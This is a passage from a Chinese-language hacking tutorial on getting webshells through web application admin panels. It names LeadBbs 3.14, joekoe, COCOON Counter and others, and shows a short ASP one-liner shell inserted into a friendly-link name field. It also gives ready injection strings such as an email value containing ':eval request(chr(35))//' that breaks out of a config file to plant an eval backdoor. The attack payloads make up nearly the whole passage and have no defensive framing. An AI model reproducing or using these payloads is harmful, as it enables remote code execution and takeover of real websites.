后缀是asp的文件。而LeadBbs3.14后台获得webshell另一方法是:添加一个新的友情链接,在网站名称处写上冰狐最小马即可,最小马前后要随便输入一些字符,http:\\网站\inc\IncHtm\BoardLink.asp就是我们想要的shell。
四、利用后台管理向配置文件写webshell
利用““““:““//“等符号构造最小马写入程序的配置文件,joekoe论坛,某某同学录,沸腾展望新闻系统,COCOON Counter统计程序等等,还有很多php程序都可以,COCOON Counter统计程序举例,在管理邮箱处添上[email protected]“:eval request(chr (35))//, 在配制文件中就是webmail=“[email protected]\“:eval request(chr(35))//“,还有一种方法就是写上 [email protected]“%><%eval request(chr(35))%><%’,页码:[1] [2] [3] [4] [5] [6] 第4页、共6页 |
